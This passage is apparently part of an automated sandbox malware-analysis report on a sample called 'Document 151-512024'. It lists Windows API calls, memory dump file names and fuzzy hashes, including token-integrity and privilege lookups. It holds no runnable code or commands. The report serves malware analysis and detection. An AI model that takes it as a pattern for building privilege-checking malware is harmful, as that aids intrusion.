                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 009AD319
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,009DCB68), ref: 009AD376
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2267087916-0
                                                                                                    • Opcode ID: 41598184303fea91cb752a7c0a18b4e9777522ac6bd1c4a6abd2ff5be47f1c74
                                                                                                    • Instruction ID: cf6fad0e10e1de0c014d3f31af56b9495e32010211c34b104a8eda6dbec8694c
                                                                                                    • Opcode Fuzzy Hash: 41598184303fea91cb752a7c0a18b4e9777522ac6bd1c4a6abd2ff5be47f1c74
                                                                                                    • Instruction Fuzzy Hash: E721567054A2029F8710DF28C88196EB7E8EF97758F504A1EF4A6C72A1DB31D945CBD3
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009A102A
                                                                                                      • Part of subcall function 009A1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009A1036
                                                                                                      • Part of subcall function 009A1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009A1045
                                                                                                      • Part of subcall function 009A1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009A104C
                                                                                                      • Part of subcall function 009A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009A1062
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009A15BE
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 009A15E1
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A1617
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A161E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1592001646-0
                                                                                                    • Opcode ID: 592bd48f9894aa4594c3d486b0246295fa646de096ae8ebd341e998d8c1d5c07
                                                                                                    • Instruction ID: 91002d1d95757c7077ff6ed25f1262db7adf2688837f88a4b900ab102c8a480a
                                                                                                    • Opcode Fuzzy Hash: 592bd48f9894aa4594c3d486b0246295fa646de096ae8ebd341e998d8c1d5c07
                                                                                                    • Instruction Fuzzy Hash: FF21AC71E41109EFDF04DFA4C949BEEB7B8EF86344F084459E441EB241E730AA45DBA0
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 009D280A
                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009D2824
                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009D2832
                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009D2840
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169480361-0
                                                                                                    • Opcode ID: e6147774f9acf85e0dd08c8abd6646856469140a665fd5fdf447522d22f75836
                                                                                                    • Instruction ID: 38195a8c68544721894e9368fc8242b6b0cecfccbc13cbfb208411d391ecc167
                                                                                                    • Opcode Fuzzy Hash: e6147774f9acf85e0dd08c8abd6646856469140a665fd5fdf447522d22f75836
                                                                                                    • Instruction Fuzzy Hash: B821D331289112AFD7149B24C844FAA7B99EF95324F14825AF4268B7E2C775FC82CB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,009A790A,?,000000FF,?,009A8754,00000000,?,0000001C,?,?), ref: 009A8D8C
                                                                                                      • Part of subcall function 009A8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 009A8DB2
                                                                                                      • Part of subcall function 009A8D7D: lstrcmpiW.KERNEL32(00000000,?,009A790A,?,000000FF,?,009A8754,00000000,?,0000001C,?,?), ref: 009A8DE3
                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009A8754,00000000,?,0000001C,?,?,00000000), ref: 009A7923
                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 009A7949
                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,009A8754,00000000,?,0000001C,?,?,00000000), ref: 009A7984
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                    • String ID: cdecl
                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                    • Opcode ID: d2b7cb5ae77494ec3a5096c019809bfa7dc6caeeeaa06a3a5069e48e1f268181
                                                                                                    • Instruction ID: 74be0b90bd47175bb13fda31dd773b19ab7c1ca216b7a682f8d1ec89f8cf7d63
                                                                                                    • Opcode Fuzzy Hash: d2b7cb5ae77494ec3a5096c019809bfa7dc6caeeeaa06a3a5069e48e1f268181
                                                                                                    • Instruction Fuzzy Hash: BB11063A205202AFCB159F75DC46E7BB7A9FFC6390B00402BF802C72A4EB319811D791
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009D7D0B
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 009D7D2A
                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009D7D42
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009BB7AD,00000000), ref: 009D7D6B
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID:
                                                                                                    • API String ID: 847901565-0
                                                                                                    • Opcode ID: ada34c705c7c76d853ce052dc9d850e790e6a7131a4b33c0a7f5ce00110a5a7a
                                                                                                    • Instruction ID: 162fe583d30e90d4d70826304890d5e04862803f3e64ae21d2313903287ed018
                                                                                                    • Opcode Fuzzy Hash: ada34c705c7c76d853ce052dc9d850e790e6a7131a4b33c0a7f5ce00110a5a7a
                                                                                                    • Instruction Fuzzy Hash: 4D11DF35259615AFCB108FA8CC04AA67BAAAF46370B11C726F93AC73F0E7308951DB50
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 009D56BB
                                                                                                    • _wcslen.LIBCMT ref: 009D56CD
                                                                                                    • _wcslen.LIBCMT ref: 009D56D8
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 009D5816
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 455545452-0
                                                                                                    • Opcode ID: a9a1b5856020c2c5754cdbd28a7f898f8ba102a5fd7f37cf461044b6ce0e000e
                                                                                                    • Instruction ID: 12c64ed8c0ee64a10662725c8b9bb76107e656e453b8736d87e9d628190d8812
                                                                                                    • Opcode Fuzzy Hash: a9a1b5856020c2c5754cdbd28a7f898f8ba102a5fd7f37cf461044b6ce0e000e
                                                                                                    • Instruction Fuzzy Hash: BD11D67568060996DF20DFA5CC85AFE776CEF50760B50C42BF915D6281EB74C984CF60
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009A1A47
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009A1A59
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009A1A6F
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009A1A8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 6c1952264417da3fbbadfd9fd1597d898c25e244ceac692c0157cc287c4897c0
                                                                                                    • Instruction ID: 265ea7a6d33e40a0e6fb9f5fa0e4c6c6b8f8f9d717ea7bfe0455253fe6fed971
                                                                                                    • Opcode Fuzzy Hash: 6c1952264417da3fbbadfd9fd1597d898c25e244ceac692c0157cc287c4897c0
                                                                                                    • Instruction Fuzzy Hash: 1D113C3AD01219FFEF10DBA4CD85FADBB78EB04750F200091E600B7290D6716E50DB94
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 009AE1FD
                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 009AE230
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009AE246
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009AE24D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2880819207-0
                                                                                                    • Opcode ID: e21fff301a0ef5b33a309128c31897b531fbebd4f46fc0d215f34804dc7aa60f
                                                                                                    • Instruction ID: 08093265a329decdd8a8b91ee7d0ada2cd9d2fcd48e6c38b1115945b3300126a
                                                                                                    • Opcode Fuzzy Hash: e21fff301a0ef5b33a309128c31897b531fbebd4f46fc0d215f34804dc7aa60f
                                                                                                    • Instruction Fuzzy Hash: 5D11C8B6909259BBC711DBE89C09BDE7FADDB46310F048256F934E7291D674890487A0
                                                                                                    APIs
                                                                                                    • CreateThread.KERNEL32(00000000,?,0096CFF9,00000000,00000004,00000000), ref: 0096D218
                                                                                                    • GetLastError.KERNEL32 ref: 0096D224
                                                                                                    • __dosmaperr.LIBCMT ref: 0096D22B
                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 0096D249
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 173952441-0
                                                                                                    • Opcode ID: 449af20f23bcf3135f056e464c10ab7aa5c9efb1370df39d1227a67c8ff7f659
                                                                                                    • Instruction ID: 2f8f67c6c23b82c92f99a12e61f75b49c4935bf13c52619c027ccbf67470f209
                                                                                                    • Opcode Fuzzy Hash: 449af20f23bcf3135f056e464c10ab7aa5c9efb1370df39d1227a67c8ff7f659
                                                                                                    • Instruction Fuzzy Hash: 05012276E0A204BBCB105BA5DC19BAA7B6CEFC2330F104219F834921D0CB71C941D6A0
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0094604C
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00946060
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0094606A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3970641297-0
                                                                                                    • Opcode ID: d7cac07f23b932988770b854d1d3c1efe5ec0d7709bd5095e866d707d19f8741
                                                                                                    • Instruction ID: c9275adb4b25af8f34ecab4e2cede1f366109e91e63782861561c02033705774
                                                                                                    • Opcode Fuzzy Hash: d7cac07f23b932988770b854d1d3c1efe5ec0d7709bd5095e866d707d19f8741
                                                                                                    • Instruction Fuzzy Hash: 28116DF2506509BFEF129FA5DC44EEABB6DEF093A5F040216FA1452110D736DCA0EBA1
                                                                                                    APIs
                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00963B56
                                                                                                      • Part of subcall function 00963AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00963AD2
                                                                                                      • Part of subcall function 00963AA3: ___AdjustPointer.LIBCMT ref: 00963AED
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00963B6B
                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00963B7C
                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00963BA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                    • String ID:
                                                                                                    • API String ID: 737400349-0
                                                                                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                    • Instruction ID: bad7e7b5119f76f8fe3ef557f8d54d9662ceec97d9b0b65997fe0be64f9b2233
                                                                                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                    • Instruction Fuzzy Hash: 76014C32100149BBDF125E95CC42EEB3F6DEF89754F048014FE4866121C732E961EBA0
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009413C6,00000000,00000000,?,0097301A,009413C6,00000000,00000000,00000000,?,0097328B,00000006,FlsSetValue), ref: 009730A5
                                                                                                    • GetLastError.KERNEL32(?,0097301A,009413C6,00000000,00000000,00000000,?,0097328B,00000006,FlsSetValue,009E2290,FlsSetValue,00000000,00000364,?,00972E46), ref: 009730B1
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0097301A,009413C6,00000000,00000000,00000000,?,0097328B,00000006,FlsSetValue,009E2290,FlsSetValue,00000000), ref: 009730BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 7ea042501beb4c281b889361a1a58b61fc3f1d689eea0d9458a213528fe34b46
                                                                                                    • Instruction ID: 21b31d59cb05f887a383aef39ed0d8fc30f4c8f18f659f5f8852cd04bb3e6cab
                                                                                                    • Opcode Fuzzy Hash: 7ea042501beb4c281b889361a1a58b61fc3f1d689eea0d9458a213528fe34b46
                                                                                                    • Instruction Fuzzy Hash: B701F7773A6223ABCB314BB89C449577B9CAF05B61B20C720F919E7180D721DD41E6E0
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 009A747F
                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009A7497
                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009A74AC
                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009A74CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 1352324309-0
                                                                                                    • Opcode ID: ee652f991ff1eaea8a1475d429802d864b153923d42512b74e08859c5a86f216
                                                                                                    • Instruction ID: bb2b675af3b6213e135f62362adaeab952d1a0ed36755e47cdc59b28675e4289
                                                                                                    • Opcode Fuzzy Hash: ee652f991ff1eaea8a1475d429802d864b153923d42512b74e08859c5a86f216
                                                                                                    • Instruction Fuzzy Hash: E71104B124A3159FE7208F94DC0AF92BFFDEB04B04F10896AA616D6061D770E944DB90
                                                                                                    APIs
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009AACD3,?,00008000), ref: 009AB0C4
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009AACD3,?,00008000), ref: 009AB0E9
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009AACD3,?,00008000), ref: 009AB0F3
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009AACD3,?,00008000), ref: 009AB126
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 2875609808-0
                                                                                                    • Opcode ID: 471d51e5d757035efeae095b2d85963a9bfb1f38655fda02353c0e79baff2889
                                                                                                    • Instruction ID: 97115b66c992932adfdd29454ed1e1309a778052cd0192f7a62cbd4894d1d350
                                                                                                    • Opcode Fuzzy Hash: 471d51e5d757035efeae095b2d85963a9bfb1f38655fda02353c0e79baff2889
                                                                                                    • Instruction Fuzzy Hash: E1118B70C0952DEBCF00AFE4E9686EEBB78FF0A311F004096D941B2186CB344691CB91
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009A2DC5
                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 009A2DD6
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 009A2DDD
                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009A2DE4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2710830443-0
